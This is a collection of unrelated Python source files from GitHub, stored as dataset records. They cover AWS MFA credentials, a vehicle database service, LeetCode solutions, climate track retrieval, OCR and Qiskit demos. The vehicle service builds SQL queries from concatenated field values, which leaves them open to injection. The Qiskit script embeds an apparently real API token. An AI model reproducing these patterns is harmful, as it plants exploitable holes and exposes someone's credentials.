datetime.datetime.utcnow()\n if t_diff.total_seconds() <= 0:\n logger.warn('Your temporary credentials have expired. '\n 'Attempting to renew...')\n return False\n\n # Validate against a real service. This may not be the best solution\n # for everyone, as the person attempting to fetch an STS token may\n # now have access to S3. This might need to be more flexible or we\n # could potentially ditch this altogether?\n s3 = boto.connect_s3()\n s3.get_all_buckets()\n\n logger.info(\n 'Temporary credentials validation successful! '\n 'Token expires in %s seconds at %s' %\n (t_diff.seconds, expiration_string)\n )\n return True\n except:\n logger.warn('Temporary credentials are invalid.')\n return False\n\n\ndef run(duration, aws_account_num, mfa_device_name, profile,\n assume_role_arn=None):\n # If no profile specified, use default\n if profile is None:\n logger.debug('Using default profile.')\n long_term_profile = 'long-term'\n short_term_profile = 'Credentials'\n else:\n logger.debug('Using profile: %s' % profile)\n long_term_profile = '%s-%s' % (profile, 'long-term')\n short_term_profile = profile\n\n # Get AWS account number. Needed to build MFA serial\n if aws_account_num is None:\n logger.error('AWS Account number must be set either via '\n 'AWS_ACT_NUM environment variable '\n 'or --aws-acct-num.')\n sys.exit(1)\n\n # If your MFA device is named something other than your\n # shell's username, it can be provided via MFA_USER\n mfa_device_name = (mfa_device_name or\n os.environ.get('USER'))\n if mfa_device_name is None:\n logger.error('Could retrieve MFA device name from environment '\n 'variables MFA_DEVICE_NAME or USER.')\n sys.exit(1)\n\n mfa_serial = 'arn:aws:iam::%s:mfa/%s' % (aws_account_num, mfa_device_name)\n\n logger.debug('Your AWS account number is: %s' % aws_account_num)\n logger.debug('Your MFA device name is: %s' % mfa_device_name)\n if assume_role_arn:\n logger.debug('You are assuming the role: %s' % assume_role_arn)\n\n # if any of the section named fields are missing, prompt for token\n if (\n boto.config.get(short_term_profile, 'aws_access_key_id') is None or\n boto.config.get(short_term_profile, 'aws_secret_access_key') is None or\n boto.config.get(short_term_profile, 'aws_security_token') is None\n ):\n logger.info(\n 'Temporary credentials are missing, obtaining them.')\n get_sts(duration, mfa_serial,\n mfa_device_name, long_term_profile,\n short_term_profile, assume_role_arn)\n\n if not test_creds(short_term_profile):\n get_sts(duration, mfa_serial,\n mfa_device_name, long_term_profile,\n short_term_profile, assume_role_arn)\n test_creds(short_term_profile)\n\n\ndef reset_credentials(profile=None):\n short_term_profile = 'Credentials'\n if profile is not None:\n short_term_profile = profile\n\n if boto.config.has_section(short_term_profile):\n options = ['aws_access_key_id', 'aws_secret_access_key',\n 'aws_security_token', 'expiration', 'assumed_role']\n for option in options:\n boto.config.save_user_option(short_term_profile, option, '')\n","repo_name":"broamski/botomfa","sub_path":"botomfa.py","file_name":"botomfa.py","file_ext":"py","file_size_in_byte":7147,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"} +{"seq_id":"27656272988","text":"from api.entidades import veiculo\nfrom api.database import db\n\nnome_tabela = \"veiculos\"\n\ndef criar_tabela():\n #Montando comando SQL\n comandoSQL = \"CREATE TABLE IF NOT EXISTS \"\n comandoSQL += nome_tabela\n comandoSQL += \"(\"\n comandoSQL += \"codigo serial primary key,\" \\\n \"codigoCliente INTEGER references clientes(codigo),\" \\\n \"placa varchar(11),\" \\\n \"marca varchar(11),\" \\\n \"modelo varchar(15)\"\n comandoSQL += \");\"\n\n\n cursor = db.cursor()\n cursor.execute(comandoSQL)\n db.commit()\n cursor.close()\n\ndef cadastrar(veiculo):\n #Montando comando SQL\n comandoSQL = \"insert into \"\n comandoSQL += nome_tabela\n comandoSQL += \"(\"\n comandoSQL += \"codigoCliente,\" \\\n \"placa,\" \\\n \"marca,\" \\\n \"modelo\" \n comandoSQL +=\") values (\"\n comandoSQL += \"'\"+str(veiculo.codigoCliente)+\"',\" \\\n \"'\" + str(veiculo.placa) + \"',\" \\\n \"'\" + str(veiculo.marca) + \"',\" \\\n \"'\"+str(veiculo.modelo)+\"'\"\n comandoSQL += \");\"\n\n #Executando comando no banco de dados\n cursor = db.cursor()\n cursor.execute(comandoSQL)\n db.commit()\n cursor.close()\n\n return veiculo\n\ndef editar(codigo, veiculo):\n #Montando comando SQL\n comandoSQL = \"UPDATE \"\n comandoSQL += nome_tabela\n comandoSQL += \" SET \"\n comandoSQL += \"marca = '\"+ str(veiculo.marca) +\"', \" \\\n \"codigoCliente = '\"+str(veiculo.codigoChefe)+\"',\" \\\n \"placa = '\" + str(veiculo.placa) + \"',\" \\\n \"modelo = '\"+str(veiculo.modelo)+\"'\"\n comandoSQL += \" where codigo='\"+str(codigo)+\"';\"\n\n #Executando comando no banco de dados\n cursor = db.cursor()\n cursor.execute(comandoSQL)\n db.commit()\n cursor.close()\n return veiculo\n\ndef getAll():\n comandoSQL = \"SELECT * FROM \"+nome_tabela+\";\"\n cursor = db.cursor()\n cursor.execute(comandoSQL)\n lista = []\n data_manager = cursor.fetchone()\n if data_manager is None:\n return None\n while data_manager is not None:\n lista.append(veiculo.Veiculo(codigo=data_manager[0], codigoCliente=data_manager[1], marca=data_manager[2], placa=data_manager[3], modelo=data_manager[4]))\n data_manager = cursor.fetchone()\n\n return lista\n\ndef get(id):\n comandoSQL = \"SELECT * from \"+nome_tabela+\" where codigo='\"+str(id)+\"';\"\n cursor = db.cursor()\n cursor.execute(comandoSQL)\n data_manager = cursor.fetchone()\n if data_manager:\n return veiculo.Veiculo(codigo=data_manager[0], codigoCliente=data_manager[1], marca=data_manager[2], placa=data_manager[3], modelo=data_manager[4])\n else:\n return None\n\ndef get_ultimo():\n comandoSQL = \"SELECT * from \"+nome_tabela+\" ORDER BY codigo DESC limit 1;\"\n cursor = db.cursor()\n cursor.execute(comandoSQL)\n data_manager = cursor.fetchone()\n if data_manager:\n return veiculo.Veiculo(codigo=data_manager[0], codigoCliente=data_manager[1], marca=data_manager[2], placa=data_manager[3], modelo=data_manager[4])\n else:\n return None","repo_name":"VictorFreitasKing/HefestoPBD","sub_path":"api/services/veiculos_service.py","file_name":"veiculos_service.py","file_ext":"py","file_size_in_byte":3095,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"10790435515","text":"# Time: O(logn)\n# Space: O(1)\n\nclass Solution(object):\n def singleNonDuplicate(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n left, right = 0, len(nums)-1\n while left <= right:\n mid = left + (right - left) / 2\n if not (mid%2 == 0 and mid+1 < len(nums) and \\\n nums[mid] == nums[mid+1]) and \\\n not (mid%2 == 1 and nums[mid] == nums[mid-1]):\n right = mid-1\n else:\n left = mid+1\n return nums[left]\n\n","repo_name":"kamyu104/LeetCode-Solutions","sub_path":"Python/single-element-in-a-sorted-array.py","file_name":"single-element-in-a-sorted-array.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","stars":4314,"dataset":"github-code","pt":"40"} +{"seq_id":"27750527900","text":"def solution(food):\n answer = ''\n start = []\n end = []\n \n for i in range(1,len(food)):\n amount = food[i]\n \n if amount==1:\n continue\n start.append((i,amount//2))\n end.append((i,amount//2))\n end.reverse()\n \n while start or end:\n if start:\n num,count = start.pop(0)\n for i in range(count):\n answer+=str(num)\n if len(start)==0:\n answer+=str(0)\n else:\n num,count = end.pop(0)\n for i in range(count):\n answer+=str(num)\n \n return answer","repo_name":"khj1998/ProblemSolving","sub_path":"프로그래머스/unrated/134240. 푸드 파이트 대회/푸드 파이트 대회.py","file_name":"푸드 파이트 대회.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"74044075321","text":"import os\n\ndef get_data_years_from_mass(suiteid, runid, ens, search, dir_final):\n '''\n Extract the track data from MASS\n '''\n if ens == '':\n moodir = 'moose:/crum/'+suiteid+'/any.nc.file/'\n else:\n moodir = 'moose:/ens/'+suiteid+'/'+ens+'/any.nc.file/'\n cmd = 'moo ls '+moodir+search+' | head -1 | cut -d _ -f 4 | cut -c 1-4'\n print(cmd)\n sts=subprocess.run(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True, check=True)\n year_start = sts.stdout\n cmd = 'moo ls '+moodir+search+' | tail -1 | cut -d _ -f 4 | cut -c 1-4'\n print(cmd)\n sts=subprocess.run(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True, check=True)\n year_end = sts.stdout\n return int(year_start), int(year_end)\n\ndef get_data_from_mass(suiteid, runid, ens, search, dir_final):\n '''\n Extract the track data from MASS\n '''\n if ens == '':\n moo_path = 'moose:/crum/'+suiteid+'/any.nc.file/'+search\n else:\n moo_path = 'moose:/ens/'+suiteid+'/'+ens+'/any.nc.file/'+search\n cmd = 'moo get -i '+moo_path+' '+dir_final\n print(cmd)\n os.system(cmd)\n\ndef work(suiteid, runid, ens, runid_info, algo, algo_type, expt, key, resol, track_method, dir_in, years, institute, rip, grid, fileformat='nc', filepattern=''):\n '''\n For a given file name format, and directory\n Get tracks from MASS archive\n '''\n\n if filepattern == '':\n filepattern = \"TC_{year}_{resol}_u-{runid}.{track_type}.{hemi}{track_m}.tracks\"\n dir_track = dir_in\n if not os.path.exists(dir_track):\n os.makedirs(dir_track)\n\n algo_search = algo\n\n if track_method == 'T42':\n track_m = ''\n elif track_method == 'T63':\n track_m = '.T63'\n elif track_method == 'T63full':\n track_m = '.T63full'\n elif track_method == 'T42new':\n track_m = ''\n else:\n track_m = ''\n track_type = runid_info['track_type']\n\n fname = filepattern.format(runid=runid, resol=resol, year='*', track_type=track_type, hemi='*', track_m=track_m, hemipos='*', algo_type=algo_type)\n\n if years == []:\n year_start, year_end = get_data_years_from_mass(suiteid, runid, ens, search, dir_track)\n years = np.arange(year_start, year_end+1)\n else:\n year_start = years[0]\n year_end = years[-1]\n\n print('get years ',years)\n for year in years:\n if year > year_end:\n continue\n if year < year_start:\n continue\n print('do year ',year)\n fname = filepattern.format(runid=runid, resol=resol, year=year, track_type=track_type, hemi='*', track_m=track_m, hemipos='*', algo_type=algo_type)\n search_fname = os.path.join(dir_track, fname)\n print ('search_fname ',search_fname)\n if not os.path.exists(search_fname):\n get_data_from_mass(suiteid, runid, ens, fname, dir_track)\n\n","repo_name":"eerie-project/storm_track_analysis","sub_path":"assess/load_data/get_tracks_from_mass.py","file_name":"get_tracks_from_mass.py","file_ext":"py","file_size_in_byte":2915,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"614065990","text":"# %%\nfrom __future__ import annotations\n\nimport os\n\nimport cv2\nimport matplotlib_inline\nimport numpy as np\nimport pytesseract\nfrom matplotlib import pyplot as plt\nfrom src import ocr\nmatplotlib_inline.backend_inline.set_matplotlib_formats('svg')\n\n# %%\nimg_inicial_path = './Codigos/Letra Preta/Cod (13).jpg'\nimg_inicial = cv2.imread(img_inicial_path)\nVALOR_T = 170 # Quanto mais clara a imagem, maior deve ser esse valor (Max - 255)\n\n# %%\n\n\ndef show(img_path, title):\n dpi = 60\n img_data = plt.imread(img_path)\n if len(img_data.shape) == 3:\n height, width, depth = img_data.shape\n else:\n height, width = img_data.shape\n\n # What size does the figure need to be in inches to fit the image?\n figsize = width / float(dpi), height / float(dpi)\n\n # Create a figure of the right size with one axes that takes up the full figure\n fig = plt.figure(figsize=figsize)\n ax = fig.add_axes([0, 0, 1, 1])\n\n # Hide spines, ticks, etc.\n ax.axis('off')\n\n # Display the image.\n ax.imshow(img_data, cmap='gray')\n\n plt.title(title)\n plt.show()\n\n\n# %%\ndef display(img, img_name):\n img_path = f'./Resultado/img_{img_name}.png'\n\n cv2.imwrite(img_path, img)\n\n show(img_path, f'Imagem {img_name}')\n\n\n# %%\ndisplay(img_inicial, 'RGB')\n\n# %%\nscale_percent = 220 # percent of original size\nwidth = int(img_inicial.shape[1] * scale_percent / 100)\nheight = int(img_inicial.shape[0] * scale_percent / 100)\ndim = (width, height)\n\n# resize image\nimg_resized = cv2.resize(img_inicial, dim, interpolation=cv2.INTER_LINEAR)\n\ndisplay(img_resized, 'Resized')\n\n\n# %% -------------------------Trasforma imagem em escala de cinza-----------------------\nimg_gray = cv2.cvtColor(img_resized, cv2.COLOR_BGR2GRAY)\n\ndisplay(img_gray, 'Grey')\n\n\n# %% ----------------------------------Inverte imagem-----------------------------------\nimg_invert = cv2.bitwise_not(img_gray)\n\ndisplay(img_invert, 'Invertida')\n\n\n# %% -------------------------Binarização da imagem-------------------------------------\nthresh = VALOR_T\nimg_binarizada = cv2.threshold(img_gray, thresh, 255, cv2.THRESH_BINARY)[1] # Usada para imagens com letra branca\n# img_binarizada = cv2.threshold(img_invert, thresh, 255, cv2.THRESH_BINARY)[1] # Usada para imagens de letra preta\n\n\n# # %% -----------------Dilatação e Erosão(Para tirar borda do dígito)--------------------\n# element_estr = cv2.getStructuringElement(cv2.MORPH_CROSS, (2, 2))\n# img_dilatada = cv2.dilate(img_binarizada, element_estr, iterations=1)\n\n# display(img_dilatada, \"Dilatada\")\n\n\n# # %% -----------------Dilatação e Erosão(Para tirar borda do dígito)--------------------\n# element_estr = cv2.getStructuringElement(cv2.MORPH_CROSS, (2, 2))\n# img_erodida = cv2.erode(img_dilatada, element_estr, iterations=1)\n\n# display(img_erodida, \"Erodida\")\n\n\n# %% -------------------------Imegem Final------------------------\nimg_final = img_binarizada\ndisplay(img_inicial, 'Inicial')\ndisplay(img_final, 'Final')\n\n\n# %% -----------------------------------Ativa o OCR na imagem---------------------------\n# config = r'--psm 6 --oem 3 -c tessedit_char_whitelist=ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 load_freq_dawg=false load_system_dawg=false'\n# pytesseract.image_to_string('./Resultado/ImagemNova.jpg', config=config)\n\n\n# %%\nprint(ocr.find_code_in_image(img_final))\n\n\n# %%\n","repo_name":"viniam/self-development","sub_path":"python/computacional_vision/exercicio/exercicio.py","file_name":"exercicio.py","file_ext":"py","file_size_in_byte":3325,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"19264817906","text":"# superposition_state.py\nimport sys\nimport os\nimport time\n\n# import qiskit from qiskit-sdk-py folder\ntry:\n sys.path.append(os.path.join(os.path.dirname(__file__), '../../', 'qiskit-sdk-py'))\n import Qconfig\n qx_config = {\n \"APItoken\": Qconfig.APItoken,\n \"url\": Qconfig.config['url']}\nexcept:\n qx_config = {\n \"APItoken\":\"da2a4002660558a35103a600bcbda7fe438cea629a6be98969ea5e367c091b6815e624bd86b6207121bd97fef79c22033318a4402eeafcbd04b021fd80f5a195\",\n \"url\":\"https://quantumexperience.ng.bluemix.net/api\"\n }\n\nfrom qiskit import ClassicalRegister, QuantumRegister, QuantumCircuit, execute\n\n# Define the Classical and Quantum Regiaters\nc = ClassicalRegister(1)\nq = QuantumRegister(1)\n\n# Build the circuit\nsuperposition_state = QuantumCircuit(q, c)\n\n# Define the superposition state given by Hadamard gate on a QuantumRegister\nsuperposition_state.h(q)\n\n# Measure the superpostion state\nsuperposition_state.measure(q, c)\n\n# Execute the circuit\njob = execute(superposition_state, backend = 'local_qasm_simulator', shots=4096)\nresult = job.result()\n\n# Print the result\nprint(result.get_counts(superposition_state))","repo_name":"oimichiu/quantumGateModel","sub_path":"IBMQX/qiskit-tutorials/coduriCareNUcompileaza/tutoriale-QISKit/01-getting_started/superposition_state.py","file_name":"superposition_state.py","file_ext":"py","file_size_in_byte":1151,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"30626401518","text":"\"\"\"\r\n1. Here the bot receives the directions from user to move.\r\n2.It quit the game when it cross the boundaries or touch itself\r\n\"\"\"\r\nfrom turtle import*\r\nfrom freegames import square,vector\r\nfrom random import randrange\r\nimport turtle\r\n\r\negg=vector(0,0)\r\nsnake=[vector(-10,0)]\r\naim=vector(0,-10)\r\n\r\ndef target(x,y):\r\n aim.x=x\r\n aim.y=y\r\n \r\n'''\r\nthis method refer boundaries\r\n'''\r\ndef border(head): \r\n return -150(.*?)\", html, re.DOTALL)\n if len(match) > 0:\n return match[0]\n raise Exception(\"ISBN not found\")\n","repo_name":"Calysto/calysto","sub_path":"calysto/util/ottobib.py","file_name":"ottobib.py","file_ext":"py","file_size_in_byte":305,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"40"} +{"seq_id":"73468252279","text":"class Solution(object):\n def targetIndices(self, nums, target):\n sorted_nums = sorted(nums)\n target_indeces = []\n \n for indx in range(len(nums)):\n if sorted_nums[indx] == target:\n target_indeces.append(indx)\n \n return target_indeces","repo_name":"Ketema741/Competitive-programming-group4","sub_path":"2089-find-target-indices-after-sorting-array/2089-find-target-indices-after-sorting-array.py","file_name":"2089-find-target-indices-after-sorting-array.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"38600029578","text":"import re\nfrom difflib import SequenceMatcher\n\nimport codecs\nimport os\nfrom collections import Counter\nfrom typing import Dict, List, Tuple\n\nimport numpy as np\nimport pandas as pd\nfrom text_unidecode import unidecode\nfrom tqdm.notebook import tqdm\n\ndef replace_encoding_with_utf8(error: UnicodeError) -> Tuple[bytes, int]:\n return error.object[error.start : error.end].encode(\"utf-8\"), error.end\n\n\ndef replace_decoding_with_cp1252(error: UnicodeError) -> Tuple[str, int]:\n return error.object[error.start : error.end].decode(\"cp1252\"), error.end\n\n\n# Register the encoding and decoding error handlers for `utf-8` and `cp1252`.\ncodecs.register_error(\"replace_encoding_with_utf8\", replace_encoding_with_utf8)\ncodecs.register_error(\"replace_decoding_with_cp1252\", replace_decoding_with_cp1252)\n\n\n\ndef resolve_encodings_and_normalize(text: str) -> str:\n \"\"\"Resolve the encoding problems and normalize the abnormal characters.\"\"\"\n text = (\n text.encode(\"raw_unicode_escape\")\n .decode(\"utf-8\", errors=\"replace_decoding_with_cp1252\")\n .encode(\"cp1252\", errors=\"replace_encoding_with_utf8\")\n .decode(\"utf-8\", errors=\"replace_decoding_with_cp1252\")\n )\n text = unidecode(text)\n return text\n\n\ndef clean_text(text):\n text = text.replace(u'\\x9d', u' ')\n text = resolve_encodings_and_normalize(text)\n # text = text.replace(u'\\xa0', u' ')\n # text = text.replace(u'\\x85', u'\\n')\n text = text.strip()\n return text\n\ndef add_text_to_df(test_df,data_folder):\n mapper = {}\n for idx in tqdm(test_df.essay_id.unique()):\n with open(data_folder/f'{idx}.txt','r') as f:\n texte = clean_text(f.read())\n # texte = resolve_encodings_and_normalize(f.read())\n # texte = texte.strip() \n mapper[idx] = texte\n\n test_df['discourse_ids'] = np.arange(len(test_df))\n test_df['essay_text'] = test_df['essay_id'].map(mapper)\n test_df['discourse_text'] = test_df['discourse_text'].transform(clean_text)\n test_df['discourse_text'] = test_df['discourse_text'].str.strip()\n\n test_df['previous_discourse_end'] = 0\n test_df['st_ed'] = test_df.apply(get_start_end('discourse_text'),axis=1)\n test_df['discourse_start'] = test_df['st_ed'].transform(lambda x:x[0])\n test_df['discourse_end'] = test_df['st_ed'].transform(lambda x:x[1])\n test_df['previous_discourse_end'] = test_df.groupby(\"essay_id\")['discourse_end'].transform(lambda x:x.shift(1).fillna(0)).astype(int)\n test_df['st_ed'] = test_df.apply(get_start_end('discourse_text'),axis=1)\n test_df['discourse_start'] = test_df['st_ed'].transform(lambda x:x[0]) #+ test_df['previous_discourse_end']\n test_df['discourse_end'] = test_df['st_ed'].transform(lambda x:x[1]) #+ test_df['previous_discourse_end']\n\n if 'target' in test_df.columns:\n classe_mapper = {'Ineffective':0,\"Adequate\":1,\"Effective\":2}\n test_df['target'] = test_df['discourse_effectiveness'].map(classe_mapper)\n \n else:\n test_df['target'] = 1 \n\n return test_df\n\n\ndef get_text_start_end(txt,s,search_from=0):\n txt = txt[int(search_from):]\n try:\n idx = txt.find(s)\n if idx>=0:\n st=idx\n ed = st+len(s)\n else:\n raise ValueError('Error')\n except: \n res = [(m.start(0), m.end(0)) for m in re.finditer(s, txt)]\n if len(res):\n st,ed = res[0][0],res[0][1]\n else:\n m = SequenceMatcher(None, s,txt).get_opcodes()\n for tag,i1,i2,j1,j2 in m:\n if tag=='replace':\n s = s[:i1]+txt[j1:j2]+s[i2:]\n if tag==\"delete\":\n s = s[:i1]+s[i2:]\n \n res = [(m.start(0), m.end(0)) for m in re.finditer(s,txt)]\n if len(res):\n st,ed = res[0][0],res[0][1]\n else:\n idx = txt.find(s)\n if idx>=0:\n st=idx\n ed = st+len(s)\n else:\n st,ed = 0,0\n return st+search_from,ed+search_from\n\ndef get_start_end(col):\n def search_start_end(row):\n txt = row.essay_text\n search_from = row.previous_discourse_end\n s = row[col]\n # print(search_from)\n return get_text_start_end(txt,s,search_from)\n return search_start_end\n\ndef batch_to_device(batch, device):\n batch_dict = {key: batch[key].to(device) for key in batch}\n return batch_dict\n\n\ndef text_to_words(text):\n word = text.split()\n word_offset = []\n\n start = 0\n for w in word:\n r = text[start:].find(w)\n\n if r==-1:\n raise NotImplementedError\n else:\n start = start+r\n end = start+len(w)\n word_offset.append((start,end))\n start = end\n\n return word, word_offset\n\ndef text_to_sentence(text):\n sentences = re.split(r' *[\\.\\?!\\n][\\'\"\\)\\]]* *', text)\n sentences = [x for x in sentences if x!=\"\"]\n \n sentence_offset = []\n start = 0\n for w in sentences:\n r = text[start:].find(w)\n\n if r==-1:\n raise NotImplementedError\n else:\n start = start+r\n end = start+len(w)\n sentence_offset.append((start,end))\n start = end\n\n return sentences,sentence_offset\n\ndef text_to_paragraph(text):\n sentences = re.split(r' *[\\n][\\'\"\\)\\]]* *', text)\n sentences = [x for x in sentences if x!=\"\"]\n \n sentence_offset = []\n start = 0\n for w in sentences:\n r = text[start:].find(w)\n\n if r==-1:\n raise NotImplementedError\n else:\n start = start+r\n end = start+len(w)\n sentence_offset.append((start,end))\n start = end\n\n return sentences,sentence_offset\n\n\ndef get_span_from_text(text,span_type=\"words\"):\n \n if span_type==\"words\":\n spans,spans_offset = text_to_words(text)\n elif span_type==\"sentences\":\n spans,spans_offset = text_to_sentence(text)\n else:\n spans,spans_offset = text_to_paragraph(text)\n \n return spans,spans_offset","repo_name":"amedprof/Feedback-Prize--English-Language-Learning","sub_path":"src/data/data_utils.py","file_name":"data_utils.py","file_ext":"py","file_size_in_byte":6078,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"40"} +{"seq_id":"4569331698","text":"'''\nMeanwhile, in other categories...\n\n\nWe learned in the last exercise that there has been significantly more sharing of physics prizes since World War II: the ratio of the number of laureates who won an unshared prize in physics in or after 1945 to the number of laureates who shared a prize in physics in or after 1945 is approximately 0.13. What is this ratio for prize categories other than physics, chemistry, and medicine?\n\nInstructions\n100 XP\n\n- Save an $elemMatch filter unshared to count laureates with unshared prizes in categories other than (\"not in\") [\"physics\", \"chemistry\", \"medicine\"] in or after 1945.\n-Save an $elemMatch filter shared to count laureates with shared (i.e., \"share\" is not \"1\") prizes in categories other than [\"physics\", \"chemistry\", \"medicine\"] in or after 1945.\n\n'''\n# Save a filter for laureates with unshared prizes\nunshared = {\n \"prizes\": {'$elemMatch': {\n \"category\": {\"$nin\": [\"physics\", \"chemistry\", \"medicine\"]},\n \"share\": \"1\",\n \"year\": {\"$gte\": \"1945\"},\n }}}\n\n# Save a filter for laureates with shared prizes\nshared = {\n \"prizes\": {\"$elemMatch\": {\n \"category\": {\"$nin\": [\"physics\", \"chemistry\", \"medicine\"]},\n \"share\": {\"$ne\": \"1\"},\n \"year\": {\"$gte\": \"1945\"},\n }}}\n\nratio = db.laureates.count_documents(\n unshared) / db.laureates.count_documents(shared)\nprint(ratio)\n","repo_name":"chandrainf/Datacamp","sub_path":"Data Engineer with Python Track/25. Introduction to MongoDB in Python/Chapter/02. Working with Distinct Values and Sets/07-Meanwhile, in other categories....py","file_name":"07-Meanwhile, in other categories....py","file_ext":"py","file_size_in_byte":1369,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"40"} +{"seq_id":"32234424338","text":"import torch\nfrom torch.nn.functional import binary_cross_entropy_with_logits as bce_loss\nfrom torch.autograd import Variable\n#http://seba1511.net/tutorials/beginner/examples_autograd/two_layer_net_autograd.html\ndtype = torch.FloatTensor\n\ndef discriminator_loss(logits_real, logits_fake):\n \"\"\"\n Computes the discriminator loss.\n \n You should use the stable torch.nn.functional.binary_cross_entropy_with_logits \n loss rather than using a separate softmax function followed by the binary cross\n entropy loss.\n \n Inputs:\n - logits_real: PyTorch Tensor of shape (N,) giving scores for the real data.\n - logits_fake: PyTorch Tensor of shape (N,) giving scores for the fake data.\n \n Returns:\n - loss: PyTorch Tensor containing (scalar) the loss for the discriminator.\n \"\"\"\n \n loss = None\n \n ####################################\n # YOUR CODE HERE #\n ####################################\n \n \n ########## END ##########\n # function provides the calculation of both log components in the objective function (i.e. log(D(x)) and log(1−D(G(z)))), generated, real\n #https://pytorch.org/docs/stable/nn.functional.html\n# print(logits_real)\n# print(\"next: \", logits_fake)\n N = logits_real.size()\n target_real = Variable(torch.ones(N)).type(dtype).cuda()\n target_generate = Variable(torch.zeros(N)).type(dtype).cuda()\n real = bce_loss(logits_real, target_real).cuda()\n generated = bce_loss(logits_fake, target_generate).cuda()\n loss = real + generated\n return loss\n\ndef generator_loss(logits_fake):\n \"\"\"\n Computes the generator loss.\n \n You should use the stable torch.nn.functional.binary_cross_entropy_with_logits \n loss rather than using a separate softmax function followed by the binary cross\n entropy loss.\n\n Inputs:\n - logits_fake: PyTorch Tensor of shape (N,) giving scores for the fake data.\n \n Returns:\n - loss: PyTorch Tensor containing the (scalar) loss for the generator.\n \"\"\"\n \n loss = None\n \n ####################################\n # YOUR CODE HERE #\n ####################################\n \n \n ########## END ##########\n N = logits_fake.size()\n target = Variable(torch.ones(N)).type(dtype).cuda()\n loss = bce_loss(logits_fake, target)\n\n return loss\n\n\ndef ls_discriminator_loss(scores_real, scores_fake):\n \"\"\"\n Compute the Least-Squares GAN loss for the discriminator.\n \n Inputs:\n - scores_real: PyTorch Tensor of shape (N,) giving scores for the real data.\n - scores_fake: PyTorch Tensor of shape (N,) giving scores for the fake data.\n \n Outputs:\n - loss: A PyTorch Tensor containing the loss.\n \"\"\"\n \n loss = None\n \n ####################################\n # YOUR CODE HERE #\n ####################################\n #https://wiseodd.github.io/techblog/2017/03/02/least-squares-gan/\n N = scores_real.size()\n target = Variable(torch.ones(N)).type(dtype).cuda()\n real = (1/2) * torch.mean( torch.pow(scores_real - target , 2) )\n generated = (1/2) * torch.mean( torch.pow(scores_fake , 2) )\n loss = real + generated\n ########## END ##########\n \n return loss\n\ndef ls_generator_loss(scores_fake):\n \"\"\"\n Computes the Least-Squares GAN loss for the generator.\n \n Inputs:\n - scores_fake: PyTorch Tensor of shape (N,) giving scores for the fake data.\n \n Outputs:\n - loss: A PyTorch Tensor containing the loss.\n \"\"\"\n \n loss = None\n \n ####################################\n # YOUR CODE HERE #\n ####################################\n N = scores_fake.size()\n target = Variable(torch.ones(N)).type(dtype).cuda()\n \n loss = (1/2) * torch.mean( torch.pow(scores_fake - target , 2) )\n \n ########## END ##########\n \n return loss\n","repo_name":"wlyu1208/UIUC","sub_path":"cs498_deep_learning/assignment4/wlyu2_mp4_code/gan/losses.py","file_name":"losses.py","file_ext":"py","file_size_in_byte":3942,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"6119958137","text":"import unittest\nfrom SPT.spt import Voice\nfrom Functions.time import Time\nfrom datetime import datetime\n\n\nclass test_Time(unittest.TestCase, Time):\n def test_Hour(self, voices=Voice()):\n # testing if the method works\n self.hour = datetime.now()\n voices.speak_en(\"Sir, the time is\" + str(self.hour))\n return self.hour\n\n def test_hour_Equal(self):\n self.hour = datetime.now()\n expected = self.hour\n result = expected\n self.assertEqual(expected, result)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"Brabitt/Virtual_Assistant","sub_path":"Test_Functions/test_time.py","file_name":"test_time.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"74697139640","text":"from typing import List\n\nfrom sqlalchemy.orm import Session\nfrom sqlalchemy import update, delete, asc\n\nfrom fastapi import Depends, APIRouter, HTTPException, Response\nfrom http import HTTPStatus\nfrom provisioning.connection_db import get_db\n\nfrom provisioning.users_db import Users\nfrom models.users_models import UsersInput, UsersResponse\n\nrouter = APIRouter()\n\n@router.get('/users/find_all/', response_model=List[UsersResponse])\nasync def find_all_users(db: Session = Depends(get_db)):\n users_in_db = db.query(Users).\\\n order_by(asc(Users.name)).\\\n all()\n if users_in_db == []:\n return Response(status_code=HTTPStatus.NO_CONTENT.value)\n return users_in_db\n \n\n@router.get('/users/find_one/{personal_id}', response_model=UsersResponse)\nasync def find_one_user(id: int, db: Session = Depends(get_db)):\n user_in_db = db.query(Users).get(id)\n if user_in_db == None:\n raise HTTPException(status_code=404, \n detail=\"User does not exist.\")\n return user_in_db\n\n\n@router.get('/users/find_by_email/{email}', response_model=UsersResponse)\nasync def find_by_email(email: str, db: Session = Depends(get_db)):\n user_in_db = db.query(Users).\\\n filter(Users.email == email).\\\n first()\n if user_in_db == None:\n raise HTTPException(status_code=404, \n detail=\"Email user does not exist.\")\n return user_in_db\n\n\n@router.post('/users/insert/', response_model=UsersResponse)\nasync def insert_user(user_in: UsersInput, db: Session = Depends(get_db)):\n user = Users(**user_in.dict())\n user_in_db = db.query(Users).get(user.id)\n if user_in_db != None:\n raise HTTPException(status_code=409, \n detail=\"The user is yet in the database.\")\n db.add( user )\n db.commit()\n db.refresh( user )\n return 